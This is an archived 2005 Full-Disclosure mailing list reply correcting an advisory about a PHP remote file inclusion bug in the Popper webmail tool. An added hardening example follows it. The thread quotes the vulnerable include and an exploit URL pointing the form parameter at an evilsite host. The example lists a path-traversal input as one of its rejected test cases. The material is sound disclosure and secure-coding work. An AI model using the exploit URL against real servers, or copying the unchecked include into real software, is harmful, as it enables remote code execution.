[Full-disclosure] Re: LSS.hr false positives. (correction)
- To: undisclosed-recipients: ;
- Subject: [Full-disclosure] Re: LSS.hr false positives. (correction)
- From: Leon Juranic <ljuranic@xxxxxx>
- Date: Mon, 6 Jun 2005 01:23:57 +0200 (CEST)
Hi b0iler,
There is a problem with the original advisory on the security.lss.hr site. The vulnerable
PHP line itself is presented as an HTML tag, so it isn't visible in a browser.
That's why the rest of the advisory doesn't make any sense.
Here it is:
--------------
..
<?php
if(file_exists($form.".toolbar.inc.php")) {
include($form.".toolbar.inc.php");
}
?>
..
..
<?php include($form.".form.inc.php");?> <- HERE IT IS
..
--------------
I apologize for that mistake, we will fix that in a few hours.
> b0iler[at]r00thell.org:
>
>>Popper is vulnerable to a remote code inclusion bug in the childwindow.inc.php
>>script that can be abused to execute arbitrary code.
>>Vulnerable code in childwindow.inc.php:
>>
>>-----
>>...
>> if(file_exists($form.".toolbar.inc.php")) {
>> include($form.".toolbar.inc.php");
>> }
>>?>
>
>file_exists() only works on local files; it does not work even with allow_url_fopen on.
>Even if the file_exists() check was not there, your description of how to exploit it
>is incorrect:
>
>>To exploit this vulnerability, an attacker has to put a script like test.form.inc.php
>>on the www.evilsite.com HTTP server, and call a url like this:
>>http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
>
>they would need to have the file test.toolbar.inc.php, not test.form.inc.php.
>It's quite obvious you did not even bother testing this before issuing the advisory.
>
Regards,
---------------------------------------
Leon Juranic, LSS Security
http://security.lss.hr
"Born under the lucky star magical,
but on this world generally tragical".
- Djole
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
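Editor's added example, not code from the Popper project or from the LSS advisory: the two includes from the corrected advisory side by side with a hardened form. The point of the thread is that file_exists() only answers for local paths, so the guarded toolbar include cannot be redirected to a URL, while the second include in childwindow.inc.php has no check at all. The constant INC_DIR and the function names below are assumptions made for this example.

```php
<?php
// Added example (not Popper's code). Assumes the include files live in a
// fixed directory INC_DIR (hypothetical) and are named <form>.form.inc.php
// and <form>.toolbar.inc.php.
const INC_DIR = __DIR__ . '/forms';

// Vulnerable pattern, as in the corrected advisory: $form comes straight
// from the query string. The first include is gated by file_exists(), which
// only returns true for local files, so it cannot be pointed at a URL. The
// second include has no check, so with allow_url_fopen (and on later PHP
// allow_url_include) enabled, a URL in $form is fetched and executed.
function include_form_unsafe(string $form): void
{
    if (file_exists($form . ".toolbar.inc.php")) {
        include($form . ".toolbar.inc.php");
    }
    include($form . ".form.inc.php");   // <- the unchecked include
}

// The request may only supply a short identifier: letters, digits,
// underscore and dash. No dots, slashes or colons, so neither "../" nor a
// URL scheme can pass.
function is_valid_form_name(string $form): bool
{
    return preg_match('/^[A-Za-z0-9_-]{1,32}$/', $form) === 1;
}

// Resolve <form><suffix> inside INC_DIR and confirm the canonical path is
// still under INC_DIR. Returns null when the name is invalid or the file
// does not exist.
function resolve_include(string $form, string $suffix): ?string
{
    if (!is_valid_form_name($form)) {
        return null;
    }
    $base = realpath(INC_DIR);
    $candidate = realpath(INC_DIR . '/' . $form . $suffix);
    if ($base === false || $candidate === false) {
        return null;
    }
    // realpath() has canonicalised both sides; require the directory prefix.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Hardened equivalent of the two includes above.
function include_form_safe(string $form): bool
{
    $toolbar = resolve_include($form, '.toolbar.inc.php');
    if ($toolbar !== null) {
        include $toolbar;
    }
    $body = resolve_include($form, '.form.inc.php');
    if ($body === null) {
        http_response_code(404);
        return false;
    }
    include $body;
    return true;
}

// Constructed inputs showing what the validator accepts and rejects.
foreach (['compose', 'http://evilsite.example/test', '../../etc/passwd', 'a.b'] as $input) {
    printf("%-32s %s\n", $input, is_valid_form_name($input) ? 'accepted' : 'rejected');
}
```

The validator, not the file_exists() call, is what closes the hole: a name that passes the pattern can only ever resolve to a file under INC_DIR, and the realpath() prefix check catches anything the pattern might miss. Disabling allow_url_fopen (or allow_url_include on PHP 5.2 and later) is a defence in depth, not a substitute, because the same unchecked include still permits local file inclusion.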